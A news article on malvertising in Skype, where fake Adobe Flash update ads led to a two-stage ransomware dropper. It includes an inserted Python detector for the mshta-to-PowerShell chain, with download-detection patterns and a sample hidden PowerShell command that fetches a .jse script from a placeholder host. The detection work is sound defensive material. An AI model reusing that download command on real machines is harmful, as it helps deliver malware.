Malvertising: Ads in Skype spread malicious software

Users report fake advertisements in the Skype app that can lead to ransomware infections. The malvertising ads push an urgent update for Adobe Flash Player, but a careless click instead triggers a multistage attack. When asked, Microsoft declined to comment.

A concerned user first described on Reddit, with a screenshot as evidence, how such a malicious ad appeared on his Skype home screen and prompted him to execute a file called "FlashPlayer.hta". Another user complained in the following days about similar incidents with Skype's in-app ads, some of which also promoted an alleged Flash update.

(Image: Reddit / j8048188)

ZDNet.com asked experts to examine the isolated code and explain how it works. The fake Flash ad was designed for Windows computers and started a download which, when executed, was meant to trigger hidden JavaScript. Its code was then supposed to delete the application the user had just opened and run a PowerShell command to download a JavaScript Encoded script (JSE).

These successive steps were apparently used to avoid detection by anti-malware software. "This is what is commonly called a two-step dropper," said Ali-Reza Anghaie of the security firm Phobos Group. "It's practically a helper component of the malware, which then decides whether further steps follow, depending on the command-and-control server it connects to." He also assumed that in 99 percent of all cases ransomware was to be expected, which encrypts the computer and then blackmails the user. There are signs that the Angler exploit kit was used, which has already been seen in previous malvertising campaigns.
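The chain described above (an opened .hta file whose script launches PowerShell to fetch a .jse script) leaves a recognisable process tree on the endpoint. The following is an added example, not code from the article or from the analysts it quotes: it triages process-creation events for that pattern. The event field names, function names and sample events are assumptions constructed for illustration.

```python
import re

# Windows script hosts; mshta.exe is the default handler for .hta files.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
FETCH = re.compile(r"downloadfile|downloadstring|invoke-webrequest|https?://", re.I)
ENCODED_SCRIPT = re.compile(r"\.jse\b", re.I)
FAKE_FLASH_HTA = re.compile(r"flash[^\\/\"]*\.hta\b", re.I)

def image_name(path):
    """Lower-cased executable name from a full Windows path."""
    return re.split(r"[\\/]", path.strip('"'))[-1].lower()

def reasons_for(event):
    """List the reasons one process-creation event matches the described chain."""
    parent, child = image_name(event["parent_image"]), image_name(event["image"])
    cmd, reasons = event["command_line"], []
    if child == "mshta.exe" and FAKE_FLASH_HTA.search(cmd):
        reasons.append("HTA file named like a Flash update was opened")
    if parent in SCRIPT_HOSTS and child in SHELLS:
        reasons.append(f"{parent} spawned {child}")
        if FETCH.search(cmd):
            reasons.append("PowerShell command line fetches remote content")
        if ENCODED_SCRIPT.search(cmd):
            reasons.append("command line references a .jse script")
    return reasons

def triage(events):
    """Map pid -> reasons for every event with at least one match."""
    return {e["pid"]: r for e in events if (r := reasons_for(e))}

# Constructed sample events (field names are assumptions, modelled on
# typical process-creation telemetry); the URL is a placeholder.
SAMPLE_EVENTS = [
    {"pid": 4100, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'mshta.exe "C:\Users\demo\Downloads\FlashPlayer.hta"'},
    {"pid": 4188, "parent_image": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -WindowStyle Hidden -Command "
                     "(New-Object Net.WebClient).DownloadFile("
                     "'http://placeholder.invalid/update.jse','update.jse')"},
    {"pid": 5020, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile Get-ChildItem"},
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

The parent/child relationship is the stronger signal here: a file name such as "FlashPlayer.hta" is trivially changed, while a script host spawning PowerShell with a download in its command line is rare in normal desktop use.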

However, the domain from which the further download was supposed to take place no longer existed, so downloading and further analysis of the actual malware code were no longer possible. Behind the fake ads are apparently attackers who constantly change domains to cover their tracks. A further domain was found in a fake Flash ad that had been uploaded to IBM's X-Force security department. BleepingComputer noted of two of the domains used that they were registered with e-mail addresses that had also been used to register a number of other dubious domains associated with malware.

It is also not the first time that Skype has attracted attention through malvertising. Threatpost reported back in 2015 on advertisements delivered by the Skype client that served to distribute malicious software. In 2016, security researchers encountered malicious ads that attacked their targets with the Angler exploit kit, which often delivered ransomware.

[With material from Zack Whittaker, ZDNet.com]
